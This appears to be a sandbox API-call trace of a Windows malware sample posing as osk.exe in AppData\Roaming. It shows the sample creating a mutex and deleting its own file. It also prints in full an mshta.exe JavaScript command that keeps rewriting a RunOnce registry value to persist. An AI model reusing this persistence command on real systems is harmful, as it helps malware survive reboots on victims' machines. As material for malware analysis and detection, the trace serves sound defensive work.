[0060.230] GlobalUnlock (hMem=0x45000c) returned 0 [0060.230] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.230] GlobalUnlock (hMem=0x450004) returned 0 [0060.230] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.230] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.230] GlobalUnlock (hMem=0x450004) returned 0 [0060.230] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.230] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.231] GlobalUnlock (hMem=0x450004) returned 0 [0060.231] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.231] GlobalUnlock (hMem=0x45000c) returned 0 [0060.231] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.231] GlobalUnlock (hMem=0x45000c) returned 0 [0060.231] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.231] GlobalLock (hMem=0x450004) returned 0x570678 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.231] GlobalUnlock (hMem=0x45000c) returned 0 [0060.231] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.231] GlobalUnlock (hMem=0x450004) returned 0 [0060.231] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.231] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.231] GlobalUnlock (hMem=0x450004) returned 0 [0060.231] GlobalLock (hMem=0x450004) returned 0x56e668 [0060.232] GlobalLock (hMem=0x45000c) returned 0x570678 [0060.232] GlobalHandle (pMem=0x56e668) returned 0x450004 [0060.232] GlobalUnlock (hMem=0x450004) returned 0 [0060.232] GlobalHandle (pMem=0x570678) returned 0x45000c [0060.232] GlobalUnlock (hMem=0x45000c) returned 0 [0060.232] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.232] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.232] GlobalUnlock (hMem=0x45000c) returned 0 [0060.232] GlobalLock (hMem=0x45000c) returned 0x56e668 [0060.232] GlobalLock (hMem=0x450004) returned 0x570678 [0060.232] GlobalHandle (pMem=0x56e668) returned 0x45000c [0060.232] GlobalUnlock (hMem=0x45000c) returned 0 [0060.232] GlobalHandle (pMem=0x570678) returned 0x450004 [0060.232] GlobalUnlock (hMem=0x450004) returned 0 [0060.233] SHGetMalloc (in: ppMalloc=0x18fd40 | out: ppMalloc=0x18fd40*=0x767666bc) returned 0x0 [0060.233] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=26, ppidl=0x18fd3c | out: ppidl=0x18fd3c) returned 0x0 [0060.403] SHGetPathFromIDListW (in: pidl=0x56eb78, pszPath=0x585634 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.405] SysReAllocStringLen (in: pbstr=0x18fd68*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x18fd68*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.405] IMalloc:Free (This=0x767666bc, pv=0x56eb78) [0060.405] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0060.405] SysReAllocStringLen (in: pbstr=0x441208*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", len=0x2d | out: pbstr=0x441208*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0060.405] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea98b8, cbMultiByte=7, lpWideCharStr=0x18ed3c, cchWideChar=2047 | out: lpWideCharStr="osk.exe\x18ㅬ疧\x18㹕疧侉W\x18") returned 7 [0060.406] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " [0060.409] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " [0060.413] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.413] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.413] GlobalUnlock (hMem=0x450004) returned 0 [0060.413] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.413] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.413] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.413] GlobalUnlock (hMem=0x450004) returned 0 [0060.413] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.413] GlobalUnlock (hMem=0x45000c) returned 0 [0060.413] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.413] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.413] GlobalUnlock (hMem=0x45000c) returned 0 [0060.413] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.414] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.414] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.414] GlobalUnlock (hMem=0x45000c) returned 0 [0060.414] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.414] GlobalUnlock (hMem=0x450004) returned 0 [0060.414] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.414] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.414] GlobalUnlock (hMem=0x450004) returned 0 [0060.414] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.414] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.414] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.414] GlobalUnlock (hMem=0x450004) returned 0 [0060.414] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.414] GlobalUnlock (hMem=0x45000c) returned 0 [0060.414] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\pmleb", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fe0c | out: phkResult=0x18fe0c*=0x0) returned 0x2 [0060.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed80ad60, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1379, cFileName="osk.exe", cAlternateFileName="")) returned 0x575308 [0060.415] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0060.415] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0060.415] FindClose (in: hFindFile=0x575308 | out: hFindFile=0x575308) returned 1 [0060.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFindFileData=0x18fbd0 | out: lpFindFileData=0x18fbd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xed1f1500, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xed80ad60, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x77c6e36c, dwReserved1=0x77cd1379, cFileName="osk.exe", cAlternateFileName="")) returned 0x575308 [0060.415] FileTimeToLocalFileTime (in: lpFileTime=0x18fbe4, lpLocalFileTime=0x18fb64 | out: lpLocalFileTime=0x18fb64) returned 1 [0060.415] FileTimeToDosDateTime (in: lpFileTime=0x18fb64, lpFatDate=0x18fbb2, lpFatTime=0x18fbb0 | out: lpFatDate=0x18fbb2, lpFatTime=0x18fbb0) returned 1 [0060.416] FindClose (in: hFindFile=0x575308 | out: hFindFile=0x575308) returned 1 [0060.416] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0 [0060.416] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.416] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.416] GlobalUnlock (hMem=0x45000c) returned 0 [0060.416] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.416] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.416] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.416] GlobalUnlock (hMem=0x45000c) returned 0 [0060.417] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.417] GlobalUnlock (hMem=0x450004) returned 0 [0060.417] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="pmleb") returned 0xe4 [0060.417] GetLastError () returned 0x0 [0060.417] SysReAllocStringLen (in: pbstr=0x18fe24*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", len=0x35 | out: pbstr=0x18fe24*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 1 [0060.417] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.417] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.417] GlobalUnlock (hMem=0x450004) returned 0 [0060.417] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.418] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.418] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.418] GlobalUnlock (hMem=0x450004) returned 0 [0060.418] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.418] GlobalUnlock (hMem=0x45000c) returned 0 [0060.418] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e62cf8, cbMultiByte=200, lpWideCharStr=0x18ed68, cchWideChar=2047 | out: lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"\x02") returned 200 [0060.418] SysReAllocStringLen (in: pbstr=0x18fd5c*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fd5c*="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"") returned 1 [0060.418] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=200, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 200 [0060.418] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.418] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=157, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 157 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=143, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 143 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=120, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 120 [0060.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=");setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=93, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=");setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 93 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=51, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 51 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=").Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=49, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=").Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\";\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 49 [0060.420] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="HKCU\\\\@!,i);}catch(e){}},10);\"", cchWideChar=30, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\\\@!,i);}catch(e){}},10);\";}catch(e){}},10);\";\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 30 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=",i);}catch(e){}},10);\"", cchWideChar=22, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=",i);}catch(e){}},10);\"}},10);\";}catch(e){}},10);\";\"o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"U\\\\@!,i);}catch(e){}},10);\"!,i);}catch(e){}},10);\"ch(e){}},10);\";o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 22 [0060.421] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="!", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="!ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.421] SysReAllocStringLen (in: pbstr=0x18fdbc*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fdbc*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"") returned 1 [0060.421] SysReAllocStringLen (in: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject(!WScript.Shell!);x=new ActiveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"") returned 1 [0060.421] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.421] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.421] GlobalUnlock (hMem=0x45000c) returned 0 [0060.422] GlobalLock (hMem=0x45000c) returned 0x57c510 [0060.422] GlobalLock (hMem=0x450004) returned 0x56f100 [0060.422] GlobalHandle (pMem=0x57c510) returned 0x45000c [0060.422] GlobalUnlock (hMem=0x45000c) returned 0 [0060.422] GlobalHandle (pMem=0x56f100) returned 0x450004 [0060.422] GlobalUnlock (hMem=0x450004) returned 0 [0060.422] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.422] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.422] GlobalUnlock (hMem=0x450004) returned 0 [0060.422] GlobalLock (hMem=0x450004) returned 0x57c510 [0060.422] GlobalLock (hMem=0x45000c) returned 0x56f100 [0060.422] GlobalHandle (pMem=0x57c510) returned 0x450004 [0060.422] GlobalUnlock (hMem=0x450004) returned 0 [0060.422] GlobalHandle (pMem=0x56f100) returned 0x45000c [0060.422] GlobalUnlock (hMem=0x45000c) returned 0 [0060.422] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e5b808, cbMultiByte=55, lpWideCharStr=0x18ed64, cchWideChar=2047 | out: lpWideCharStr="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb䭈啃屜⅀椬㬩捽瑡档攨笩絽ㄬ⤰∻iveXObject(!Scripting.FileSystemObject!);setInterval(function(){try{i=x.GetFile(!#!).Path;o.RegWrite(!HKCU\\\\@!,i);}catch(e){}},10);\"\x02") returned 55 [0060.430] SysReAllocStringLen (in: pbstr=0x18fd5c*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", len=0xc8 | out: pbstr=0x18fd5c*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"") returned 1 [0060.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", cchWideChar=200, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 200 [0060.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="',i);}catch(e){}},10);\"", cchWideChar=23, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="',i);}catch(e){}},10);\"=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"i", lpUsedDefaultChar=0x0) returned 23 [0060.431] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="@", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="@ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.431] SysReAllocStringLen (in: pbstr=0x18fdb8*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x103 | out: pbstr=0x18fdb8*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.431] SysReAllocStringLen (in: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\@',i);}catch(e){}},10);\"", psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x103 | out: pbstr=0x18fe18*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.432] SysReAllocStringLen (in: pbstr=0x18fd5c*=0x0, psz="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", len=0x103 | out: pbstr=0x18fd5c*="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"") returned 1 [0060.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", cchWideChar=259, lpMultiByteStr=0x18ed28, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mshta.exe \"javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('#').Path;o.RegWrite('HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\pmleb',i);}catch(e){}},10);\"", lpUsedDefaultChar=0x0) returned 259 [0060.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="#", cchWideChar=1, lpMultiByteStr=0x18ed24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="#ý\x18", lpUsedDefaultChar=0x0) returned 1 [0060.432] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 